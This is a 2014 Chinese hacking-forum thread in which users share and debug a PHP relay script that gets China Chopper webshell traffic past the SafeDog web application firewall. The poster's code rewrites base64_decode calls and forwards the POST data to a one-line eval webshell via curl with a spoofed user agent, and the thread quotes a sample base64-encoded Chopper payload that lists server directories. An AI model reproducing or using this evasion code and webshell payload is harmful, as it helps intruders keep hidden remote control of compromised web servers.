还是一句话过狗,php中转
本帖最后由 beizidream 于 2014-5-29 23:18 编辑看到大牛们各种虐杀小狗,各种羡慕嫉妒恨, 于是自己弄个了简单的,
将菜刀里面的关键字base64_encode用post中转
一句话
生成中转
手动提交测试,还是妥妥的
放到菜刀,里面,结果。。。。
抓包调试,结果,结果,没有抓到,直接连一句话能抓到,中转脚本没有{:soso_e153:}
核心代码
private function SendUrl($encodResult){
if (strpos($this->config['url'],'?') === false) $url = $this->config['url'].'?124213=base64_decode';
else $url = $this->config['url'].'&124213=base64_decode';
$postData = $_POST;
$data = str_replace("base64_decode(", '$_GET(', $postData);
$ch =curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0');
$output = curl_exec($ch);
curl_close($ch);
echo $output;
}
大神给点意见吧 需要开启 CURL buxuan 发表于 2014-5-30 09:08
需要开启 CURL
肯定开始了的,要不手动测试也通不过啊:)
手动测试中转完全正常 来个php大年吧 , 简单的post参数中转没问题,参数像下面这个就完全没中转了
123=@eval(base64_decode($_POST));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7
用到这个curl完全没有操作了 问题解决了:L 一个人玩得好happy beizidream 发表于 2014-5-30 15:58
问题解决了 一个人玩得好happy
为何不参照下小影的中转呢 hack.me 中转配置呢? beizidream 发表于 2014-5-30 12:51
来个php大年吧 , 简单的post参数中转没问题,参数像下面这个就完全没中转了
123=@eval(base64_decode($_P ...
过狗可以,可是用来藏shell就不行了。。。
关键词 eval 直接定位--
眼睛一看这样的代码就是高危代码..
也只能用来过狗了 blck 发表于 2014-5-31 23:46
hack.me 中转配置呢?
hack.me 是我本地 127.0.0.1
页:
[1]
2